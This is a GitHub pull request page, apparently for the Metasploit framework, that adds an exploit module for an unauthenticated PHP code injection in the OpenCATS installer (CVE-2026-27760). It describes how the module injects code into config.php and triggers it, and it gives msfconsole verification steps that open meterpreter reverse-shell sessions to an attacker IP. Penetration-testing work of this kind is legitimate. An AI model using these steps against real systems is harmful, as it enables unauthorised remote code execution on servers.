Add OpenCATS installer PHP code injection module (CVE-2026-27760)#21630
Open
stlthr4k3r wants to merge 1 commit into
Open
Add OpenCATS installer PHP code injection module (CVE-2026-27760)#21630stlthr4k3r wants to merge 1 commit into
stlthr4k3r wants to merge 1 commit into
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This module exploits CVE-2026-27760, a PHP code injection in OpenCATS. The installer endpoint takes user input and writes it straight into config.php without sanitising it, so if the installation wasn't completed you can inject arbitrary PHP code that runs on every page load after that. No credentials needed.
The module injects the payload, waits until it's actually live (it checks in a loop so it handles OPcache gracefully regardless of how the server is configured), triggers it, then restores config.php afterwards.
Worth mentioning that this does require the INSTALL_BLOCK file to be absent, so it only affects instances where the wizard was never finished. Probably not many of those around but the vulnerability is real and patched.
Documentation and a Docker lab setup are included. Tested with php/meterpreter/reverse_tcp and linux/x64/meterpreter/reverse_tcp against OpenCATS 0.9.7.4.
New to this, any and all help appreciated. TIA (:
Verification
msfconsole
use exploit/multi/http/opencats_installer_rce
set RHOSTS
set RPORT
set LHOST <attacker_ip>
check → should report Vulnerable
set payload php/meterpreter/reverse_tcp + exploit → PHP meterpreter session
set target 3 + set payload linux/x64/meterpreter/reverse_tcp + exploit → meterpreter via CmdStager
Confirm config.php is restored after the session
Full docs at documentation/modules/exploit/multi/http/opencats_installer_rce.md